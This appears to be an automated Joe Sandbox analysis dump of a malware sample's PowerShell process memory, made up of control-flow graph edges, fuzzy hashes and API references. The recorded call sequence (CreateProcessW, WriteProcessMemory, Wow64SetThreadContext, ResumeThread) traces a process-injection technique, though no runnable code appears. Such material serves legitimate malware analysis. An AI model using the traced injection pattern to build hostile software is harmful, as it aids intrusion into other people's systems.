                                                                                                                                                                                        control_flow_graph 469 371e18-371e2a 470 371e30-371e41 469->470 471 371eea-371ef0 469->471 476 371e43-371e49 470->476 477 371e5b-371e78 470->477 474 371f14 471->474 475 371ef2-371f13 471->475 478 371f16-371f17 474->478 479 371f1a-371f1e 474->479 475->474 480 371e4d-371e59 476->480 481 371e4b 476->481 477->471 489 371e7a-371e9c 477->489 482 371f44-371f4c 478->482 483 371f19 478->483 484 371f36-371f43 479->484 485 371f20-371f26 479->485 480->477 481->477 493 371f70-371f7a 482->493 494 371f4e-371f6e 482->494 483->479 487 371f2a-371f35 485->487 488 371f28 485->488 487->484 488->484 499 371eb6-371ece 489->499 500 371e9e-371ea4 489->500 497 371f80-371f85 493->497 498 3720a9-372124 493->498 494->493 501 371f87-371f8d 497->501 502 371f9d-371faa 497->502 534 372126-372134 498->534 535 372151-372156 498->535 513 371ed0-371ed2 499->513 514 371edc-371ee7 499->514 503 371ea6 500->503 504 371ea8-371eb4 500->504 506 371f91-371f9b 501->506 507 371f8f 501->507 502->498 508 371fb0-371fb7 502->508 503->499 504->499 506->502 507->502 511 371fcf-371fde 508->511 512 371fb9-371fbf 508->512 511->498 515 371fe4-371feb 511->515 518 371fc3-371fc5 512->518 519 371fc1 512->519 513->514 520 372003-37201c 515->520 521 371fed-371ff3 515->521 518->511 519->511 520->498 527 372022-372027 520->527 522 371ff7-371ff9 521->522 523 371ff5 521->523 522->520 523->520 528 37203f-372058 527->528 529 372029-37202f 527->529 549 37205b call 252b65 528->549 550 37205b call 252f26 528->550 551 37205b call 252f80 528->551 552 37205b call 252b22 528->552 553 37205b call 252b8f 528->553 554 37205b call 252e48 528->554 555 37205b call 2532aa 528->555 556 37205b call 252b75 528->556 557 37205b call 252b71 528->557 558 37205b call 252c90 528->558 559 37205b call 252c72 528->559 560 37205b call 253199 528->560 561 37205b call 252b79 528->561 531 372033-37203d 529->531 532 372031 529->532 531->528 532->528 543 37213c-37214b 534->543 535->534 538 37205d-372066 538->498 540 372068-37206d 538->540 541 372085-37209c 540->541 542 37206f-372075 540->542 548 3720a1-3720a8 541->548 544 372077 542->544 545 372079-372083 542->545 543->535 544->541 545->541 549->538 550->538 551->538 552->538 553->538 554->538 555->538 556->538 557->538 558->538 559->538 560->538 561->538
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479562737.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_370000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: l;)$l;)
                                                                                                                                                                                        • API String ID: 0-1670069901
                                                                                                                                                                                        • Opcode ID: cb5117c3cd0cd8855389413d0fc5ff45ce4f1bbec8a3f21c58f9399b5b3ecb61
                                                                                                                                                                                        • Instruction ID: 972b082ef779ece780341b1705eafe02b53489655184754647a3484c58384d7a
                                                                                                                                                                                        • Opcode Fuzzy Hash: cb5117c3cd0cd8855389413d0fc5ff45ce4f1bbec8a3f21c58f9399b5b3ecb61
                                                                                                                                                                                        • Instruction Fuzzy Hash: A7B1C531B042419FD722DB68C854A6ABBF2AF85710B15C1AAD909CF392CB75DD42CB61

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 562 257c00-257c79 563 257c81-257c88 562->563 564 257c7b-257c7e 562->564 565 257c93-257ca9 563->565 566 257c8a-257c90 563->566 564->563 567 257cb4-257d57 CreateProcessW 565->567 568 257cab-257cb1 565->568 566->565 570 257d60-257dd8 567->570 571 257d59-257d5f 567->571 568->567 578 257dea-257df1 570->578 579 257dda-257de0 570->579 571->570 580 257df3-257e02 578->580 581 257e08 578->581 579->578 580->581 583 257e09 581->583 583->583
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00257D44
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479514587.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_250000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                        • Opcode ID: 9252474da838300a346dbc278f99aa2e41ef7a559c69c15116ca0ba375ba4a35
                                                                                                                                                                                        • Instruction ID: 19951c33d8986ba5753baa5fb255c00af5479dbff055cdf4f0314efc8c7a70e6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9252474da838300a346dbc278f99aa2e41ef7a559c69c15116ca0ba375ba4a35
                                                                                                                                                                                        • Instruction Fuzzy Hash: C251177190121A9FEF24CF99C840BDDBBB5BF48304F1084AAE909B7240D7719A98CF50

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 584 257fb8-257ffe 585 258000-258006 584->585 586 258008-258041 WriteProcessMemory 584->586 585->586 587 258043-258049 586->587 588 25804a-25806b 586->588 587->588
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00258034
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479514587.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_250000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                        • Opcode ID: 6ffce7786b898a7eca7088162770b310d5a36de4e56da8f0fd13870d71d97d91
                                                                                                                                                                                        • Instruction ID: 455f8dec7da84a8273ecc44d44e4095455bdb11a48dc1a41610b90b04f940d11
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ffce7786b898a7eca7088162770b310d5a36de4e56da8f0fd13870d71d97d91
                                                                                                                                                                                        • Instruction Fuzzy Hash: EA21E7B1910259DFDB10CF99D884BDEBBF4FB48350F50842AE918B7250D378AA54CB65

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 590 257fb6-257ffe 591 258000-258006 590->591 592 258008-258041 WriteProcessMemory 590->592 591->592 593 258043-258049 592->593 594 25804a-25806b 592->594 593->594
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00258034
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479514587.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_250000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                        • Opcode ID: e91e98c0f032881794247702a0e475ff8c093692e6321629565f32d9d7d49c70
                                                                                                                                                                                        • Instruction ID: 62518ec1a8e88e145413297949dc00af897333335bd64ab69909d21ca960067c
                                                                                                                                                                                        • Opcode Fuzzy Hash: e91e98c0f032881794247702a0e475ff8c093692e6321629565f32d9d7d49c70
                                                                                                                                                                                        • Instruction Fuzzy Hash: 202113B1910209DFDB10CF99C984BDEBBF4FB48310F50842AE818B7250D378AA58CF64

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 596 257e38-257e80 597 257e82-257e8a 596->597 598 257e8c-257eb8 Wow64SetThreadContext 596->598 597->598 599 257ec1-257ee2 598->599 600 257eba-257ec0 598->600 600->599
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00257EAB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479514587.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_250000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                        • Opcode ID: 24e36984fa67c01da7ebeb53aa797c79af5226bced364f588c82aca90960ff21
                                                                                                                                                                                        • Instruction ID: 9034d3b29b8bba0cf80815bb94941ee11cfb8f98d0a04687d78c02b77939dfc2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 24e36984fa67c01da7ebeb53aa797c79af5226bced364f588c82aca90960ff21
                                                                                                                                                                                        • Instruction Fuzzy Hash: 121137B2D106498FDB10CF9AD944BDFBBF4EB88310F24846AD459B3240D3789A45CF65

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 602 257e40-257e80 603 257e82-257e8a 602->603 604 257e8c-257eb8 Wow64SetThreadContext 602->604 603->604 605 257ec1-257ee2 604->605 606 257eba-257ec0 604->606 606->605
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00257EAB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479514587.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_250000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                        • Opcode ID: 5e516e04ab775707e76f8e2d820476ee36722107556bea1bd2adeb4dbbf81baa
                                                                                                                                                                                        • Instruction ID: f425c4276198b0198bebef49269e35fb205aa577c5c2f2305571b160f18a8de4
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e516e04ab775707e76f8e2d820476ee36722107556bea1bd2adeb4dbbf81baa
                                                                                                                                                                                        • Instruction Fuzzy Hash: A51116B2D143498FDB10CF9AD844BDEFBF4EB88320F158469D818A3240D378AA45CFA5

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 608 2575d8-2575e8 call 256b8c 611 2575ee-2575fc 608->611 612 257528-257566 ResumeThread 608->612 613 257602-257605 611->613 614 256fcd-256fd0 611->614 615 25756f-25757c 612->615 616 257568-25756e 612->616 613->614 617 256fd6-2575a6 614->617 618 2578d0-2578d9 614->618 619 257582-257593 615->619 620 257a7b-257a82 615->620 616->615 622 257988-2579a8 617->622 628 2575ac-2575cb 617->628 621 2578df-2578f2 618->621 618->622 619->614 624 257599-25759c 619->624 621->614 621->622 633 2579b3-2579b6 622->633 634 2579aa-2579af 622->634 624->614 628->614 631 2575d1-2575d3 628->631 631->614 635 2579d3-2579ea 633->635 636 2579b8 633->636 634->633 635->633 644 2579ec 635->644 636->635 637 2579bf-2579cd 636->637 638 2579ee-2579f7 636->638 639 257a18-257ad0 636->639 637->633 640 2579cf-2579d1 637->640 642 257a1f-257a41 638->642 643 2579f9-257a03 638->643 640->633 649 257a47-257a4a 642->649 650 256f51-256f54 642->650 651 257a05-257a0a 643->651 652 257a0c-257a16 call 2556e8 643->652 644->633 649->650 655 257a54-257a6d 650->655 656 256f5a 650->656 651->633 652->639 659 2579b1 652->659 655->650 658 257a73-257a76 655->658 656->642 658->650 659->633
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479514587.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_250000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                        • Opcode ID: c75aad986e3479b6bb80055944fb89cb18b7f674e78517ab5ebf634499c729e9
                                                                                                                                                                                        • Instruction ID: f394f713fdc07e7cb215e2595f4259c7428d20ee657ed57db58c4552ed0d8715
                                                                                                                                                                                        • Opcode Fuzzy Hash: c75aad986e3479b6bb80055944fb89cb18b7f674e78517ab5ebf634499c729e9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C116930928204CFEB20CF54E84CB9CB7B2BB0031AF6085C5D809AB691D3749E9DCF15

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 660 257528-257566 ResumeThread 661 25756f-25757c 660->661 662 257568-25756e 660->662 663 257582-257593 661->663 664 257a7b-257a82 661->664 662->661 666 256fcd-256fd0 663->666 667 257599-25759c 663->667 668 256fd6-2575a6 666->668 669 2578d0-2578d9 666->669 667->666 671 257988-2579a8 668->671 675 2575ac-2575cb 668->675 670 2578df-2578f2 669->670 669->671 670->666 670->671 680 2579b3-2579b6 671->680 681 2579aa-2579af 671->681 675->666 678 2575d1-2575d3 675->678 678->666 682 2579d3-2579ea 680->682 683 2579b8 680->683 681->680 682->680 691 2579ec 682->691 683->682 684 2579bf-2579cd 683->684 685 2579ee-2579f7 683->685 686 257a18-257ad0 683->686 684->680 687 2579cf-2579d1 684->687 689 257a1f-257a41 685->689 690 2579f9-257a03 685->690 687->680 696 257a47-257a4a 689->696 697 256f51-256f54 689->697 698 257a05-257a0a 690->698 699 257a0c-257a16 call 2556e8 690->699 691->680 696->697 702 257a54-257a6d 697->702 703 256f5a 697->703 698->680 699->686 706 2579b1 699->706 702->697 705 257a73-257a76 702->705 703->689 705->697 706->680
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479514587.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_250000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                        • Opcode ID: d5bdc89633a12bbd6ca93bb3a84f6035be52abccad21349898149f9a4c8fc4b5
                                                                                                                                                                                        • Instruction ID: a5c09885ef4c1e79516437c373ab79d8e4b1b73238bcc50d5604f3107683bb6c
                                                                                                                                                                                        • Opcode Fuzzy Hash: d5bdc89633a12bbd6ca93bb3a84f6035be52abccad21349898149f9a4c8fc4b5
                                                                                                                                                                                        • Instruction Fuzzy Hash: 37013174928204CFEB20CF54E84C79CBBB2AB14316F6085C5D81967691C7B49EDDCF16

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 707 3708bc-3708ed 708 370aa3-370af3 707->708 709 3708f3-3708f8 707->709 717 370cf6-370d23 708->717 718 370af9-370afe 708->718 710 370910-37091c 709->710 711 3708fa-370900 709->711 719 370922-370925 710->719 720 370a3e-370a48 710->720 713 370904-37090e 711->713 714 370902 711->714 713->710 714->710 754 371c12-371c45 717->754 755 370d29-370d4e 717->755 722 370b16-370b1a 718->722 723 370b00-370b06 718->723 719->720 726 37092b-370932 719->726 724 370a56-370a5c 720->724 725 370a4a-370a53 720->725 731 370b20-370b22 722->731 732 370c9f-370ca9 722->732 727 370b0a-370b14 723->727 728 370b08 723->728 729 370a62-370a6e 724->729 730 370a5e-370a60 724->730 726->708 734 370938-37093d 726->734 727->722 728->722 735 370a70-370aa0 729->735 730->735 736 370b24-370b30 731->736 737 370b32 731->737 740 370cb5-370cbb 732->740 741 370cab-370cb2 732->741 738 370955-370959 734->738 739 37093f-370945 734->739 744 370b34-370b36 736->744 737->744 738->720 748 37095f-370961 738->748 746 370947 739->746 747 370949-370953 739->747 749 370cc1-370ccd 740->749 750 370cbd-370cbf 740->750 744->732 756 370b3c-370b5b 744->756 746->738 747->738 748->720 751 370967-37096b 748->751 752 370ccf-370cf3 749->752 750->752 751->720 757 370971-370975 751->757 768 371c47-371c4b 754->768 769 371c6c-371c76 754->769 755->754 766 370d54-370d79 755->766 777 370b5d-370b69 756->777 778 370b6b 756->778 757->720 761 37097b-37097f 757->761 761->720 767 370985-370989 761->767 766->754 784 370d7f-370da4 766->784 767->720 771 37098f-370993 767->771 768->769 773 371c4d-371c54 768->773 774 371c81-371c87 769->774 775 371c78-371c7e 769->775 771->720 779 370999-37099d 771->779 780 371c56-371c66 773->780 781 371cb9-371cbe 773->781 782 371c8d-371c99 774->782 783 371c89-371c8b 774->783 785 370b6d-370b6f 777->785 778->785 779->720 786 3709a3-3709af 779->786 780->769 781->780 787 371c9b-371cb6 782->787 783->787 784->754 795 370daa-370dc9 784->795 785->732 789 370b75-370b79 785->789 794 3709b9-3709ca 786->794 789->732 793 370b7f-370b83 789->793 796 370b96 793->796 797 370b85-370b94 793->797 983 3709cd call 255730 794->983 984 3709cd call 255760 794->984 795->754 805 370dcf-370e04 795->805 799 370b98-370b9a 796->799 797->799 799->732 802 370ba0-370ba4 799->802 800 3709d3-3709da 803 3709e1-370a2f 800->803 804 3709dc-3709df 800->804 802->732 806 370baa-370bc9 802->806 807 370a34-370a3b 803->807 804->807 805->754 812 370e0a-370e2f 805->812 814 370be1-370bec 806->814 815 370bcb-370bd1 806->815 812->754 822 370e35-370e5a 812->822 820 370bee-370bf1 814->820 821 370bfb-370c17 814->821 818 370bd5-370bd7 815->818 819 370bd3 815->819 818->814 819->814 820->821 823 370c34-370c3e 821->823 824 370c19-370c2c 821->824 822->754 829 370e60-370e85 822->829 827 370c42-370c90 823->827 828 370c40 823->828 824->823 830 370c95-370c9c 827->830 828->830 829->754 836 370e8b-370eb0 829->836 836->754 839 370eb6-370edb 836->839 839->754 843 370ee1-370f06 839->843 843->754 846 370f0c-370f31 843->846 846->754 848 370f37-370f5c 846->848 848->754 850 370f62-370f87 848->850 850->754 852 370f8d-370fb2 850->852 852->754 854 370fb8-370fdd 852->854 854->754 856 370fe3-371008 854->856 856->754 858 37100e-371033 856->858 858->754 860 371039-37105e 858->860 860->754 862 371064-371089 860->862 862->754 864 37108f-3710b4 862->864 864->754 866 3710ba-3710df 864->866 866->754 868 3710e5-371112 866->868 868->754 870 371118-37113d 868->870 870->754 872 371143-371168 870->872 872->754 874 37116e-371193 872->874 874->754 876 371199-3711be 874->876 876->754 878 3711c4-3711e9 876->878 878->754 880 3711ef-371214 878->880 880->754 882 37121a-37123f 880->882 882->754 884 371245-37126a 882->884 884->754 886 371270-37128f 884->886 886->754 888 371295-3712ca 886->888 888->754 890 3712d0-3712f5 888->890 890->754 892 3712fb-371320 890->892 892->754 894 371326-37134b 892->894 894->754 896 371351-371376 894->896 896->754 898 37137c-3713a1 896->898 898->754 900 3713a7-371c11 898->900 983->800 984->800
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479562737.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_370000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $;)
                                                                                                                                                                                        • API String ID: 0-3188015226
                                                                                                                                                                                        • Opcode ID: 1719844d5630c3c54aaae48377eb773564197eb13afcb6bfe1f49cd50c4c8899
                                                                                                                                                                                        • Instruction ID: 86050284a839a3af466a4184ce2a1e27e8238a8a0b132123af3ca99bba243894
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1719844d5630c3c54aaae48377eb773564197eb13afcb6bfe1f49cd50c4c8899
                                                                                                                                                                                        • Instruction Fuzzy Hash: 62316E31A00309DFDF7ACF69C548BAAB7B1BB59304F16C069E918971A1C379DD90CB81

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 1208 373265-373268 1209 37326e-373276 1208->1209 1210 37326a-37326c 1208->1210 1211 37328e-373292 1209->1211 1212 373278-37327e 1209->1212 1210->1209 1215 3733f3-3733fd 1211->1215 1216 373298-37329c 1211->1216 1213 373282-37328c 1212->1213 1214 373280 1212->1214 1213->1211 1214->1211 1217 3733ff-373408 1215->1217 1218 37340b-373411 1215->1218 1219 3732af 1216->1219 1220 37329e-3732ad 1216->1220 1222 373417-373423 1218->1222 1223 373413-373415 1218->1223 1224 3732b1-3732b3 1219->1224 1220->1224 1225 373425-373443 1222->1225 1223->1225 1224->1215 1226 3732b9-3732d9 1224->1226 1232 3732db-3732f6 1226->1232 1233 3732f8 1226->1233 1234 3732fa-3732fc 1232->1234 1233->1234 1234->1215 1236 373302-373304 1234->1236 1237 373306-373312 1236->1237 1238 373314 1236->1238 1240 373316-373318 1237->1240 1238->1240 1240->1215 1241 37331e-37333e 1240->1241 1244 373356-37335a 1241->1244 1245 373340-373346 1241->1245 1248 373374-373378 1244->1248 1249 37335c-373362 1244->1249 1246 37334a-37334c 1245->1246 1247 373348 1245->1247 1246->1244 1247->1244 1252 37337f-373381 1248->1252 1250 373366-373372 1249->1250 1251 373364 1249->1251 1250->1248 1251->1248 1253 373383-373389 1252->1253 1254 373399-3733f0 1252->1254 1256 37338d-37338f 1253->1256 1257 37338b 1253->1257 1256->1254 1257->1254
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479562737.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_370000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: edbef6522b9bfb7f3d3a2b9b461176b0bfd437738af2c91c3226e1f798bc79b4
                                                                                                                                                                                        • Instruction ID: efcf332ec532280e1d4302d22be940dd07530b7ff372f69a02431cb7205badf6
                                                                                                                                                                                        • Opcode Fuzzy Hash: edbef6522b9bfb7f3d3a2b9b461176b0bfd437738af2c91c3226e1f798bc79b4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 74412439704202DBEF3A5A65D4102BAB7A5ABD1310B21C47AC84E8B291DF7DCE41F762
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479562737.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_370000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 37fe48706bac32ee2da8bd41597a75e4116268ae62f52dc9994c05de4c002896
                                                                                                                                                                                        • Instruction ID: ebb149519e415dd30ee2e9ade1cfb68036ddfe18ab06dc13189aba948b14823d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 37fe48706bac32ee2da8bd41597a75e4116268ae62f52dc9994c05de4c002896
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B31B331A09290DFC732CB68C864A69BFB1AF86700F1AC0DBD9489F292C7759D45CB51
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479562737.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_370000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 6345b7dc6b4fa1764731f85dd19ba68c3913737c82726d3c6ba1ae15898f514c
                                                                                                                                                                                        • Instruction ID: d539d5fdd3313b3c18fb72269291e6e88c7a2a3e8c5531ebe4293d43d8b1b1a2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6345b7dc6b4fa1764731f85dd19ba68c3913737c82726d3c6ba1ae15898f514c
                                                                                                                                                                                        • Instruction Fuzzy Hash: A8217C30A00205EFDB3E9E65C454669B7A6BB54310F16C066E41C8B251D778EC81CF92
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479477780.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_12d000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 7906bb75aae4cff7edfae8766b6ba20ecd1ee47385be4065be39d73346d3b0ac
                                                                                                                                                                                        • Instruction ID: f76367b3b684a517d5815ba0f744037404e38df6b7b565895d3fcd3db771f866
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7906bb75aae4cff7edfae8766b6ba20ecd1ee47385be4065be39d73346d3b0ac
                                                                                                                                                                                        • Instruction Fuzzy Hash: FE01696140D3D09FE7128B25EC94662BFA4DF53224F1981CBE8888F1A3C2689C49CB72
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479477780.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_12d000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 12d08709486b4cebed84be64a77efaa207e489ccfd5dda9b2dfdba10c88afce9
                                                                                                                                                                                        • Instruction ID: e53d92454a565d1fea2b9bfb2f3bd4b68943fd331c317043a104605402bffd2c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 12d08709486b4cebed84be64a77efaa207e489ccfd5dda9b2dfdba10c88afce9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 17014730004350AEE7188A11FC8476BBF98DF80324F18C015FC484B192C3798D45CAB5
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479562737.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_370000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: L4#p$L4#p$L4#p$L:)$L:)
                                                                                                                                                                                        • API String ID: 0-1614654535
                                                                                                                                                                                        • Opcode ID: abaa37b50f574ec385e926044e412e3edc52ac254b1868a6764ac04aa6564087
                                                                                                                                                                                        • Instruction ID: 913c7b933263f88355c078663fb23178b15a93b734f01e6639fe65261e8d46d0
                                                                                                                                                                                        • Opcode Fuzzy Hash: abaa37b50f574ec385e926044e412e3edc52ac254b1868a6764ac04aa6564087
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4141A335600248EFDF3ACE55D4447BE7BA6AB40310F19C166E90D9B2D2C7B8DD85CB91

                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                        Execution Coverage:15%
                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                        Total number of Nodes:89
                                                                                                                                                                                        Total number of Limit Nodes:5
